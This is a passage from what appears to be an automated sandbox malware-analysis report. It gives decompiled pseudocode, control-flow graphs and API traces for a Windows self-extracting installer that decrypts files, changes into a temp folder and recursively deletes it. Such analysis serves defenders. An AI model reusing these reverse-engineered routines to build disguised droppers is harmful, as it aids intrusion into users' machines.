                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 450 c2f1d-c2f3d 451 c2f6c-c2f73 call c5164 450->451 452 c2f3f-c2f46 450->452 461 c2f79-c2f80 call c55a0 451->461 462 c3041 451->462 453 c2f5f-c2f66 call c3a3f 452->453 454 c2f48 call c51e5 452->454 453->451 453->462 459 c2f4d-c2f4f 454->459 459->462 465 c2f55-c2f5d 459->465 461->462 468 c2f86-c2fbe GetSystemDirectoryA call c658a LoadLibraryA 461->468 464 c3043-c3053 call c6ce0 462->464 465->451 465->453 472 c2ff7-c3004 FreeLibrary 468->472 473 c2fc0-c2fd4 GetProcAddress 468->473 475 c3006-c300c 472->475 476 c3017-c3024 SetCurrentDirectoryA 472->476 473->472 474 c2fd6-c2fee DecryptFileA 473->474 474->472 486 c2ff0-c2ff5 474->486 475->476 479 c300e call c621e 475->479 477 c3054-c305a 476->477 478 c3026-c303c call c44b9 call c6285 476->478 482 c305c call c3b26 477->482 483 c3065-c306c 477->483 478->462 490 c3013-c3015 479->490 494 c3061-c3063 482->494 488 c307c-c3089 483->488 489 c306e-c3075 call c256d 483->489 486->472 491 c308b-c3091 488->491 492 c30a1-c30a9 488->492 496 c307a 489->496 490->462 490->476 491->492 497 c3093 call c3ba2 491->497 499 c30ab-c30ad 492->499 500 c30b4-c30b7 492->500 494->462 494->483 496->488 503 c3098-c309a 497->503 499->500 502 c30af call c4169 499->502 500->464 502->500 503->462 505 c309c 503->505 505->492
                                                                                                                                                                                                        C-Code - Quality: 82%
                                                                                                                                                                                                        			E000C2F1D(void* __ecx, int __edx) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v272;
                                                                                                                                                                                                        				_Unknown_base(*)()* _v276;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t9;
                                                                                                                                                                                                        				void* _t11;
                                                                                                                                                                                                        				struct HWND__* _t12;
                                                                                                                                                                                                        				void* _t14;
                                                                                                                                                                                                        				int _t21;
                                                                                                                                                                                                        				signed int _t22;
                                                                                                                                                                                                        				signed int _t25;
                                                                                                                                                                                                        				intOrPtr* _t26;
                                                                                                                                                                                                        				signed int _t27;
                                                                                                                                                                                                        				void* _t30;
                                                                                                                                                                                                        				_Unknown_base(*)()* _t31;
                                                                                                                                                                                                        				void* _t34;
                                                                                                                                                                                                        				struct HINSTANCE__* _t36;
                                                                                                                                                                                                        				intOrPtr _t41;
                                                                                                                                                                                                        				intOrPtr* _t44;
                                                                                                                                                                                                        				signed int _t46;
                                                                                                                                                                                                        				int _t47;
                                                                                                                                                                                                        				void* _t58;
                                                                                                                                                                                                        				void* _t59;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t43 = __edx;
                                                                                                                                                                                                        				_t9 =  *0xc8004; // 0x374600bf
                                                                                                                                                                                                        				_v8 = _t9 ^ _t46;
                                                                                                                                                                                                        				if( *0xc8a38 != 0) {
                                                                                                                                                                                                        					L5:
                                                                                                                                                                                                        					_t11 = E000C5164(_t52);
                                                                                                                                                                                                        					_t53 = _t11;
                                                                                                                                                                                                        					if(_t11 == 0) {
                                                                                                                                                                                                        						L16:
                                                                                                                                                                                                        						_t12 = 0;
                                                                                                                                                                                                        						L17:
                                                                                                                                                                                                        						return E000C6CE0(_t12, _t36, _v8 ^ _t46, _t43, _t44, _t45);
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_t14 = E000C55A0(_t53); // executed
                                                                                                                                                                                                        					if(_t14 == 0) {
                                                                                                                                                                                                        						goto L16;
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						_t45 = 0x105;
                                                                                                                                                                                                        						GetSystemDirectoryA( &_v272, 0x105);
                                                                                                                                                                                                        						_t43 = 0x105;
                                                                                                                                                                                                        						_t40 =  &_v272;
                                                                                                                                                                                                        						E000C658A( &_v272, 0x105, "advapi32.dll");
                                                                                                                                                                                                        						_t36 = LoadLibraryA( &_v272);
                                                                                                                                                                                                        						_t44 = 0;
                                                                                                                                                                                                        						if(_t36 != 0) {
                                                                                                                                                                                                        							_t31 = GetProcAddress(_t36, "DecryptFileA");
                                                                                                                                                                                                        							_v276 = _t31;
                                                                                                                                                                                                        							if(_t31 != 0) {
                                                                                                                                                                                                        								_t45 = _t47;
                                                                                                                                                                                                        								_t40 = _t31;
                                                                                                                                                                                                        								 *0xca288("C:\Users\jones\AppData\Local\Temp\IXP001.TMP\", 0); // executed
                                                                                                                                                                                                        								_v276();
                                                                                                                                                                                                        								if(_t47 != _t47) {
                                                                                                                                                                                                        									_t40 = 4;
                                                                                                                                                                                                        									asm("int 0x29");
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						FreeLibrary(_t36);
                                                                                                                                                                                                        						_t58 =  *0xc8a24 - _t44; // 0x0
                                                                                                                                                                                                        						if(_t58 != 0) {
                                                                                                                                                                                                        							L14:
                                                                                                                                                                                                        							_t21 = SetCurrentDirectoryA("C:\Users\jones\AppData\Local\Temp\IXP001.TMP\"); // executed
                                                                                                                                                                                                        							if(_t21 != 0) {
                                                                                                                                                                                                        								__eflags =  *0xc8a2c - _t44; // 0x0
                                                                                                                                                                                                        								if(__eflags != 0) {
                                                                                                                                                                                                        									L20:
                                                                                                                                                                                                        									__eflags =  *0xc8d48 & 0x000000c0;
                                                                                                                                                                                                        									if(( *0xc8d48 & 0x000000c0) == 0) {
                                                                                                                                                                                                        										_t41 =  *0xc9a40; // 0x3, executed
                                                                                                                                                                                                        										_t26 = E000C256D(_t41); // executed
                                                                                                                                                                                                        										_t44 = _t26;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									_t22 =  *0xc8a24; // 0x0
                                                                                                                                                                                                        									 *0xc9a44 = _t44;
                                                                                                                                                                                                        									__eflags = _t22;
                                                                                                                                                                                                        									if(_t22 != 0) {
                                                                                                                                                                                                        										L26:
                                                                                                                                                                                                        										__eflags =  *0xc8a38;
                                                                                                                                                                                                        										if( *0xc8a38 == 0) {
                                                                                                                                                                                                        											__eflags = _t22;
                                                                                                                                                                                                        											if(__eflags == 0) {
                                                                                                                                                                                                        												E000C4169(__eflags);
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        										_t12 = 1;
                                                                                                                                                                                                        										goto L17;
                                                                                                                                                                                                        									} else {
                                                                                                                                                                                                        										__eflags =  *0xc9a30 - _t22; // 0x0
                                                                                                                                                                                                        										if(__eflags != 0) {
                                                                                                                                                                                                        											goto L26;
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        										_t25 = E000C3BA2(); // executed
                                                                                                                                                                                                        										__eflags = _t25;
                                                                                                                                                                                                        										if(_t25 == 0) {
                                                                                                                                                                                                        											goto L16;
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        										_t22 =  *0xc8a24; // 0x0
                                                                                                                                                                                                        										goto L26;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								_t27 = E000C3B26(_t40, _t44);
                                                                                                                                                                                                        								__eflags = _t27;
                                                                                                                                                                                                        								if(_t27 == 0) {
                                                                                                                                                                                                        									goto L16;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								goto L20;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							_t43 = 0x4bc;
                                                                                                                                                                                                        							E000C44B9(0, 0x4bc, _t44, _t44, 0x10, _t44);
                                                                                                                                                                                                        							 *0xc9124 = E000C6285();
                                                                                                                                                                                                        							goto L16;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t59 =  *0xc9a30 - _t44; // 0x0
                                                                                                                                                                                                        						if(_t59 != 0) {
                                                                                                                                                                                                        							goto L14;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t30 = E000C621E(); // executed
                                                                                                                                                                                                        						if(_t30 == 0) {
                                                                                                                                                                                                        							goto L16;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						goto L14;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t49 =  *0xc8a24;
                                                                                                                                                                                                        				if( *0xc8a24 != 0) {
                                                                                                                                                                                                        					L4:
                                                                                                                                                                                                        					_t34 = E000C3A3F(_t51);
                                                                                                                                                                                                        					_t52 = _t34;
                                                                                                                                                                                                        					if(_t34 == 0) {
                                                                                                                                                                                                        						goto L16;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					goto L5;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				if(E000C51E5(_t49) == 0) {
                                                                                                                                                                                                        					goto L16;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t51 =  *0xc8a38;
                                                                                                                                                                                                        				if( *0xc8a38 != 0) {
                                                                                                                                                                                                        					goto L5;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				goto L4;
                                                                                                                                                                                                        			}




























                                                                                                                                                                                                        0x000c2f1d
                                                                                                                                                                                                        0x000c2f28
                                                                                                                                                                                                        0x000c2f2f
                                                                                                                                                                                                        0x000c2f3d
                                                                                                                                                                                                        0x000c2f6c
                                                                                                                                                                                                        0x000c2f6c
                                                                                                                                                                                                        0x000c2f71
                                                                                                                                                                                                        0x000c2f73
                                                                                                                                                                                                        0x000c3041
                                                                                                                                                                                                        0x000c3041
                                                                                                                                                                                                        0x000c3043
                                                                                                                                                                                                        0x000c3053
                                                                                                                                                                                                        0x000c3053
                                                                                                                                                                                                        0x000c2f79
                                                                                                                                                                                                        0x000c2f80
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c2f86
                                                                                                                                                                                                        0x000c2f86
                                                                                                                                                                                                        0x000c2f93
                                                                                                                                                                                                        0x000c2f9e
                                                                                                                                                                                                        0x000c2fa0
                                                                                                                                                                                                        0x000c2fa6
                                                                                                                                                                                                        0x000c2fb8
                                                                                                                                                                                                        0x000c2fba
                                                                                                                                                                                                        0x000c2fbe
                                                                                                                                                                                                        0x000c2fc6
                                                                                                                                                                                                        0x000c2fcc
                                                                                                                                                                                                        0x000c2fd4
                                                                                                                                                                                                        0x000c2fd6
                                                                                                                                                                                                        0x000c2fd8
                                                                                                                                                                                                        0x000c2fe0
                                                                                                                                                                                                        0x000c2fe6
                                                                                                                                                                                                        0x000c2fee
                                                                                                                                                                                                        0x000c2ff0
                                                                                                                                                                                                        0x000c2ff5
                                                                                                                                                                                                        0x000c2ff5
                                                                                                                                                                                                        0x000c2fee
                                                                                                                                                                                                        0x000c2fd4
                                                                                                                                                                                                        0x000c2ff8
                                                                                                                                                                                                        0x000c2ffe
                                                                                                                                                                                                        0x000c3004
                                                                                                                                                                                                        0x000c3017
                                                                                                                                                                                                        0x000c301c
                                                                                                                                                                                                        0x000c3024
                                                                                                                                                                                                        0x000c3054
                                                                                                                                                                                                        0x000c305a
                                                                                                                                                                                                        0x000c3065
                                                                                                                                                                                                        0x000c3065
                                                                                                                                                                                                        0x000c306c
                                                                                                                                                                                                        0x000c306e
                                                                                                                                                                                                        0x000c3075
                                                                                                                                                                                                        0x000c307a
                                                                                                                                                                                                        0x000c307a
                                                                                                                                                                                                        0x000c307c
                                                                                                                                                                                                        0x000c3081
                                                                                                                                                                                                        0x000c3087
                                                                                                                                                                                                        0x000c3089
                                                                                                                                                                                                        0x000c30a1
                                                                                                                                                                                                        0x000c30a1
                                                                                                                                                                                                        0x000c30a9
                                                                                                                                                                                                        0x000c30ab
                                                                                                                                                                                                        0x000c30ad
                                                                                                                                                                                                        0x000c30af
                                                                                                                                                                                                        0x000c30af
                                                                                                                                                                                                        0x000c30ad
                                                                                                                                                                                                        0x000c30b6
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c308b
                                                                                                                                                                                                        0x000c308b
                                                                                                                                                                                                        0x000c3091
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c3093
                                                                                                                                                                                                        0x000c3098
                                                                                                                                                                                                        0x000c309a
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c309c
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c309c
                                                                                                                                                                                                        0x000c3089
                                                                                                                                                                                                        0x000c305c
                                                                                                                                                                                                        0x000c3061
                                                                                                                                                                                                        0x000c3063
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c3063
                                                                                                                                                                                                        0x000c302b
                                                                                                                                                                                                        0x000c3032
                                                                                                                                                                                                        0x000c303c
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c303c
                                                                                                                                                                                                        0x000c3006
                                                                                                                                                                                                        0x000c300c
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c300e
                                                                                                                                                                                                        0x000c3015
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c3015
                                                                                                                                                                                                        0x000c2f80
                                                                                                                                                                                                        0x000c2f3f
                                                                                                                                                                                                        0x000c2f46
                                                                                                                                                                                                        0x000c2f5f
                                                                                                                                                                                                        0x000c2f5f
                                                                                                                                                                                                        0x000c2f64
                                                                                                                                                                                                        0x000c2f66
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c2f66
                                                                                                                                                                                                        0x000c2f4f
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c2f55
                                                                                                                                                                                                        0x000c2f5d
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetSystemDirectoryA.KERNEL32 ref: 000C2F93
                                                                                                                                                                                                        • LoadLibraryA.KERNEL32(?,advapi32.dll), ref: 000C2FB2
                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,DecryptFileA), ref: 000C2FC6
                                                                                                                                                                                                        • DecryptFileA.ADVAPI32 ref: 000C2FE6
                                                                                                                                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 000C2FF8
                                                                                                                                                                                                        • SetCurrentDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP001.TMP\), ref: 000C301C
                                                                                                                                                                                                          • Part of subcall function 000C51E5: LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,000C2F4D,?,00000002,00000000), ref: 000C5201
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.422517102.00000000000C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 000C0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.422505692.00000000000C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.422529324.00000000000C8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_c0000_szV94FU13.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: DirectoryLibrary$AddressAllocCurrentDecryptFileFreeLoadLocalProcSystem
                                                                                                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$DecryptFileA$advapi32.dll
                                                                                                                                                                                                        • API String ID: 2126469477-3023407756
                                                                                                                                                                                                        • Opcode ID: 23792afaaa3c312cbc27627e076f38e3486ca85419ceed7baf7fb460feba5d18
                                                                                                                                                                                                        • Instruction ID: b65c68b01ddfcaab188eb70e2d0ebf6a07757b8e0b50eef48299cf35a3400f72
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 23792afaaa3c312cbc27627e076f38e3486ca85419ceed7baf7fb460feba5d18
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7D41C9326106058AFB70AB719C59F9E33E8DB45754F20803DAD41C2593EF78CE80CB96
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 648 c2390-c23b3 649 c23b9-c23bc 648->649 650 c24cb-c24df call c6ce0 648->650 649->650 652 c23c2-c2401 call c1680 call c16b3 FindFirstFileA 649->652 652->650 658 c2407-c241f call c1680 652->658 661 c2479-c24a3 call c16b3 SetFileAttributesA DeleteFileA 658->661 662 c2421-c242f lstrcmpA 658->662 664 c24a9-c24b7 FindNextFileA 661->664 662->664 665 c2431-c2443 lstrcmpA 662->665 664->658 667 c24bd-c24c5 FindClose RemoveDirectoryA 664->667 665->664 668 c2445-c2477 call c16b3 call c658a call c2390 665->668 667->650 668->664
                                                                                                                                                                                                        C-Code - Quality: 86%
                                                                                                                                                                                                        			E000C2390(CHAR* __ecx) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v276;
                                                                                                                                                                                                        				char _v280;
                                                                                                                                                                                                        				char _v284;
                                                                                                                                                                                                        				struct _WIN32_FIND_DATAA _v596;
                                                                                                                                                                                                        				struct _WIN32_FIND_DATAA _v604;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t21;
                                                                                                                                                                                                        				int _t36;
                                                                                                                                                                                                        				void* _t46;
                                                                                                                                                                                                        				void* _t62;
                                                                                                                                                                                                        				void* _t63;
                                                                                                                                                                                                        				CHAR* _t65;
                                                                                                                                                                                                        				void* _t66;
                                                                                                                                                                                                        				signed int _t67;
                                                                                                                                                                                                        				signed int _t69;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t69 = (_t67 & 0xfffffff8) - 0x254;
                                                                                                                                                                                                        				_t21 =  *0xc8004; // 0x374600bf
                                                                                                                                                                                                        				_t22 = _t21 ^ _t69;
                                                                                                                                                                                                        				_v8 = _t21 ^ _t69;
                                                                                                                                                                                                        				_t65 = __ecx;
                                                                                                                                                                                                        				if(__ecx == 0 ||  *((char*)(__ecx)) == 0) {
                                                                                                                                                                                                        					L10:
                                                                                                                                                                                                        					_pop(_t62);
                                                                                                                                                                                                        					_pop(_t66);
                                                                                                                                                                                                        					_pop(_t46);
                                                                                                                                                                                                        					return E000C6CE0(_t22, _t46, _v8 ^ _t69, _t58, _t62, _t66);
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					E000C1680( &_v276, 0x104, __ecx);
                                                                                                                                                                                                        					_t58 = 0x104;
                                                                                                                                                                                                        					E000C16B3( &_v280, 0x104, "*");
                                                                                                                                                                                                        					_t22 = FindFirstFileA( &_v284,  &_v604); // executed
                                                                                                                                                                                                        					_t63 = _t22;
                                                                                                                                                                                                        					if(_t63 == 0xffffffff) {
                                                                                                                                                                                                        						goto L10;
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						goto L3;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					do {
                                                                                                                                                                                                        						L3:
                                                                                                                                                                                                        						_t58 = 0x104;
                                                                                                                                                                                                        						E000C1680( &_v276, 0x104, _t65);
                                                                                                                                                                                                        						if((_v604.ftCreationTime & 0x00000010) == 0) {
                                                                                                                                                                                                        							_t58 = 0x104;
                                                                                                                                                                                                        							E000C16B3( &_v276, 0x104,  &(_v596.dwReserved1));
                                                                                                                                                                                                        							SetFileAttributesA( &_v280, 0x80);
                                                                                                                                                                                                        							DeleteFileA( &_v280);
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							if(lstrcmpA( &(_v596.dwReserved1), ".") != 0 && lstrcmpA( &(_v596.cFileName), "..") != 0) {
                                                                                                                                                                                                        								E000C16B3( &_v276, 0x104,  &(_v596.cFileName));
                                                                                                                                                                                                        								_t58 = 0x104;
                                                                                                                                                                                                        								E000C658A( &_v280, 0x104, 0xc1140);
                                                                                                                                                                                                        								E000C2390( &_v284);
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t36 = FindNextFileA(_t63,  &_v596); // executed
                                                                                                                                                                                                        					} while (_t36 != 0);
                                                                                                                                                                                                        					FindClose(_t63); // executed
                                                                                                                                                                                                        					_t22 = RemoveDirectoryA(_t65); // executed
                                                                                                                                                                                                        					goto L10;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        			}





















                                                                                                                                                                                                        0x000c2398
                                                                                                                                                                                                        0x000c239e
                                                                                                                                                                                                        0x000c23a3
                                                                                                                                                                                                        0x000c23a5
                                                                                                                                                                                                        0x000c23ae
                                                                                                                                                                                                        0x000c23b3
                                                                                                                                                                                                        0x000c24cb
                                                                                                                                                                                                        0x000c24d2
                                                                                                                                                                                                        0x000c24d3
                                                                                                                                                                                                        0x000c24d4
                                                                                                                                                                                                        0x000c24df
                                                                                                                                                                                                        0x000c23c2
                                                                                                                                                                                                        0x000c23d1
                                                                                                                                                                                                        0x000c23db
                                                                                                                                                                                                        0x000c23e4
                                                                                                                                                                                                        0x000c23f6
                                                                                                                                                                                                        0x000c23fc
                                                                                                                                                                                                        0x000c2401
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c2407
                                                                                                                                                                                                        0x000c2407
                                                                                                                                                                                                        0x000c2408
                                                                                                                                                                                                        0x000c2411
                                                                                                                                                                                                        0x000c241f
                                                                                                                                                                                                        0x000c247a
                                                                                                                                                                                                        0x000c2483
                                                                                                                                                                                                        0x000c2495
                                                                                                                                                                                                        0x000c24a3
                                                                                                                                                                                                        0x000c2421
                                                                                                                                                                                                        0x000c242f
                                                                                                                                                                                                        0x000c2453
                                                                                                                                                                                                        0x000c245d
                                                                                                                                                                                                        0x000c2466
                                                                                                                                                                                                        0x000c2472
                                                                                                                                                                                                        0x000c2472
                                                                                                                                                                                                        0x000c242f
                                                                                                                                                                                                        0x000c24af
                                                                                                                                                                                                        0x000c24b5
                                                                                                                                                                                                        0x000c24be
                                                                                                                                                                                                        0x000c24c5
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c24c5

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • FindFirstFileA.KERNELBASE(?,000C8A3A,000C11F4,000C8A3A,00000000,?,?), ref: 000C23F6
                                                                                                                                                                                                        • lstrcmpA.KERNEL32(?,000C11F8), ref: 000C2427
                                                                                                                                                                                                        • lstrcmpA.KERNEL32(?,000C11FC), ref: 000C243B
                                                                                                                                                                                                        • SetFileAttributesA.KERNEL32(?,00000080,?), ref: 000C2495
                                                                                                                                                                                                        • DeleteFileA.KERNEL32(?), ref: 000C24A3
                                                                                                                                                                                                        • FindNextFileA.KERNELBASE(00000000,00000010), ref: 000C24AF
                                                                                                                                                                                                        • FindClose.KERNELBASE(00000000), ref: 000C24BE
                                                                                                                                                                                                        • RemoveDirectoryA.KERNELBASE(000C8A3A), ref: 000C24C5
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.422517102.00000000000C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 000C0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.422505692.00000000000C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.422529324.00000000000C8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_c0000_szV94FU13.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: File$Find$lstrcmp$AttributesCloseDeleteDirectoryFirstNextRemove
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 836429354-0
                                                                                                                                                                                                        • Opcode ID: 9adf8deb1d28a7978107eac7b852d84bf0d33eb3d08aa4ee08857601080d9a2d
                                                                                                                                                                                                        • Instruction ID: 4da26651c4ca0c8a9a7b1fdefd3fa6d665700a06e37c2c94a78066075969a5a5
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9adf8deb1d28a7978107eac7b852d84bf0d33eb3d08aa4ee08857601080d9a2d
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7831A1327047449BD320EBA4CC89FEF73ECABC6345F14492DB99586292EB389909C752
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 70%
                                                                                                                                                                                                        			E000C2BFB(struct HINSTANCE__* _a4, intOrPtr _a12) {
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				void* __ebp;
                                                                                                                                                                                                        				long _t4;
                                                                                                                                                                                                        				void* _t6;
                                                                                                                                                                                                        				intOrPtr _t7;
                                                                                                                                                                                                        				void* _t9;
                                                                                                                                                                                                        				struct HINSTANCE__* _t12;
                                                                                                                                                                                                        				intOrPtr* _t17;
                                                                                                                                                                                                        				signed char _t19;
                                                                                                                                                                                                        				intOrPtr* _t21;
                                                                                                                                                                                                        				void* _t22;
                                                                                                                                                                                                        				void* _t24;
                                                                                                                                                                                                        				intOrPtr _t32;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t4 = GetVersion();
                                                                                                                                                                                                        				if(_t4 >= 0 && _t4 >= 6) {
                                                                                                                                                                                                        					_t12 = GetModuleHandleW(L"Kernel32.dll");
                                                                                                                                                                                                        					if(_t12 != 0) {
                                                                                                                                                                                                        						_t21 = GetProcAddress(_t12, "HeapSetInformation");
                                                                                                                                                                                                        						if(_t21 != 0) {
                                                                                                                                                                                                        							_t17 = _t21;
                                                                                                                                                                                                        							 *0xca288(0, 1, 0, 0);
                                                                                                                                                                                                        							 *_t21();
                                                                                                                                                                                                        							_t29 = _t24 - _t24;
                                                                                                                                                                                                        							if(_t24 != _t24) {
                                                                                                                                                                                                        								_t17 = 4;
                                                                                                                                                                                                        								asm("int 0x29");
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t20 = _a12;
                                                                                                                                                                                                        				_t18 = _a4;
                                                                                                                                                                                                        				 *0xc9124 = 0;
                                                                                                                                                                                                        				if(E000C2CAA(_a4, _a12, _t29, _t17) != 0) {
                                                                                                                                                                                                        					_t9 = E000C2F1D(_t18, _t20); // executed
                                                                                                                                                                                                        					_t22 = _t9; // executed
                                                                                                                                                                                                        					E000C52B6(0, _t18, _t21, _t22); // executed
                                                                                                                                                                                                        					if(_t22 != 0) {
                                                                                                                                                                                                        						_t32 =  *0xc8a3a; // 0x0
                                                                                                                                                                                                        						if(_t32 == 0) {
                                                                                                                                                                                                        							_t19 =  *0xc9a2c; // 0x0
                                                                                                                                                                                                        							if((_t19 & 0x00000001) != 0) {
                                                                                                                                                                                                        								E000C1F90(_t19, _t21, _t22);
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t6 =  *0xc8588; // 0x0
                                                                                                                                                                                                        				if(_t6 != 0) {
                                                                                                                                                                                                        					CloseHandle(_t6);
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t7 =  *0xc9124; // 0x80070002
                                                                                                                                                                                                        				return _t7;
                                                                                                                                                                                                        			}


















                                                                                                                                                                                                        0x000c2c03
                                                                                                                                                                                                        0x000c2c0d
                                                                                                                                                                                                        0x000c2c18
                                                                                                                                                                                                        0x000c2c20
                                                                                                                                                                                                        0x000c2c2e
                                                                                                                                                                                                        0x000c2c32
                                                                                                                                                                                                        0x000c2c36
                                                                                                                                                                                                        0x000c2c3d
                                                                                                                                                                                                        0x000c2c43
                                                                                                                                                                                                        0x000c2c45
                                                                                                                                                                                                        0x000c2c47
                                                                                                                                                                                                        0x000c2c49
                                                                                                                                                                                                        0x000c2c4e
                                                                                                                                                                                                        0x000c2c4e
                                                                                                                                                                                                        0x000c2c47
                                                                                                                                                                                                        0x000c2c32
                                                                                                                                                                                                        0x000c2c20
                                                                                                                                                                                                        0x000c2c50
                                                                                                                                                                                                        0x000c2c54
                                                                                                                                                                                                        0x000c2c57
                                                                                                                                                                                                        0x000c2c64
                                                                                                                                                                                                        0x000c2c66
                                                                                                                                                                                                        0x000c2c6b
                                                                                                                                                                                                        0x000c2c6d
                                                                                                                                                                                                        0x000c2c74
                                                                                                                                                                                                        0x000c2c76
                                                                                                                                                                                                        0x000c2c7c
                                                                                                                                                                                                        0x000c2c7e
                                                                                                                                                                                                        0x000c2c87
                                                                                                                                                                                                        0x000c2c89
                                                                                                                                                                                                        0x000c2c89
